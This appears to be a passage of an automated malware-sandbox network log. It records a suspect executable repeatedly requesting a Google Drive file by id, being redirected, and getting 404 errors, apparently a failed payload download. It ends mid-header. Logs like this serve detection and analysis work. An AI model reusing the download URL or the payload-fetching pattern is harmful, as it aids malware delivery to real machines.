                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    7  192.168.2.7  52047  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:11 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:12 UTC  1851  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgSQlDxdwPPpnQe-m8d8HRWbvK1dV1T7h1JhMpVi234qKnTMI9rM9JLWlbh33qrady4TsoACAuU
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:11 GMT
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-SUloJBdq08Wmxnct-C8ckg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:12 UTC  1652  IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="CPx04b8Suu3sWNc_OaH5MA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    8  192.168.2.7  52053  172.217.18.14  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:12 UTC  417  OUT  GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:13 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:12 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-4I6TFxJYhvhQjnKM_9MYLw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    9  192.168.2.7  52062  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:13 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:14 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgRTwu84u5Ut8GDTXXUUBlel7w7BRgvm1PuGo450eWbm3bRrtTwyn_DAiC-ziLTv6sEC
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:14 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-kIfC2fgDuGA5Ah0OYsRs0w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:14 UTC  1652  IN
                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yuaw0zvX3BjnAZuacdRX3g">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    10  192.168.2.7  52070  172.217.18.14  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:15 UTC  417  OUT  GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:15 UTC  1920  IN  HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:15 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-v4nx6z8otwgWM_8iltqh5A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
                                                    11  192.168.2.7  52079  142.250.186.161  443  4640  C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp  Bytes transferred  Direction  Data
                                                    2025-01-10 14:39:16 UTC  459  OUT  GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:16 UTC  1844  IN  HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFIdbgR8F2yw_7PkrsHvGToRrzvC0tPnOg1bpkxDRE_ZfI6h1XXqaiGqJsROg4P-OAu8v2Vr
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:16 GMT
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Security-Policy: script-src 'nonce-HFAAB58pqtatZqrZF6aAZA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:16 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="upSKiXzxfBgaagm-BwTjHA">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    12 | 192.168.2.7 | 52087 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:17 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:17 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:17 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Content-Security-Policy: script-src 'nonce-9EAYi_IRVA5ik-fqU-biDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    13 | 192.168.2.7 | 52096 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:18 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:18 UTC | 1851 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC6jDpoRhB22UYIVkvBabWEXrunev6AKw4RVe3hNHklu9apobvC08KYe9zCNwMp2ROhdYlGwrno
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:18 GMT
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-qvB0efGXTjX0_JNoLP4AWA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Content-Length: 1652
                                                    Server: UploadServer
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Content-Security-Policy: sandbox allow-scripts
                                                    Connection: close
                                                    2025-01-10 14:39:18 UTC | 1652 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="vl1uxThwfn3VecE4hH3VVg">*{margin:0;padding:0}html,code{font:15px/22px arial


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    14 | 192.168.2.7 | 52104 | 172.217.18.14 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:19 UTC | 417 | OUT | GET /uc?export=download&id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Host: drive.google.com
                                                    Cache-Control: no-cache
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:20 UTC | 1920 | IN | HTTP/1.1 303 See Other
                                                    Content-Type: application/binary
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:19 GMT
                                                    Location: https://drive.usercontent.google.com/download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download
                                                    Strict-Transport-Security: max-age=31536000
                                                    Content-Security-Policy: script-src 'nonce-EP2rc61UYJf113cxUpyNxw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                    Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlist
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlist
                                                    Cross-Origin-Opener-Policy: same-origin
                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Server: ESF
                                                    Content-Length: 0
                                                    X-XSS-Protection: 0
                                                    X-Frame-Options: SAMEORIGIN
                                                    X-Content-Type-Options: nosniff
                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                    Connection: close


                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                    15 | 192.168.2.7 | 52112 | 142.250.186.161 | 443 | 4640 | C:\Users\user\Desktop\fTSt7dc60O.exe
                                                    Timestamp | Bytes transferred | Direction | Data
                                                    2025-01-10 14:39:20 UTC | 459 | OUT | GET /download?id=17VEveFnKbLEpDjw_o-LRbwbJdNQXDVmZ&export=download HTTP/1.1
                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:131.0) Gecko/20100101 Firefox/131.0
                                                    Cache-Control: no-cache
                                                    Host: drive.usercontent.google.com
                                                    Connection: Keep-Alive
                                                    Cookie: NID=520=T5uyjBS8M28aMPPil4JejxLt3vhmlr-6LKr4b-f-gEyXQEP7xyhQBkz0Sr1OFxXKeOgwkV1T-FRHrYKW_kjWUlc8zu-soSchKgBs4F02-gcAdPXLRfOv-o0aPu_fTU2jyl_CedEULM2K3xfWXIjb9bDrbBJkBAWYiMUhknSlML-duXtzJKqlesU
                                                    2025-01-10 14:39:21 UTC | 1844 | IN | HTTP/1.1 404 Not Found
                                                    X-GUploader-UploadID: AFiumC5_fc1ipyVIv6tpaZPwVC0iEOmAWExlV7j6f3CkakvZUD_I6rjRiHABRTHImHShlfRI
                                                    Content-Type: text/html; charset=utf-8
                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                    Pragma: no-cache
                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                    Date: Fri, 10 Jan 2025 14:39:20 GMT
                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                    Content-Security-Policy: script-src 'nonce-JLxsTBT3zNKdTnhFbOvnXw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
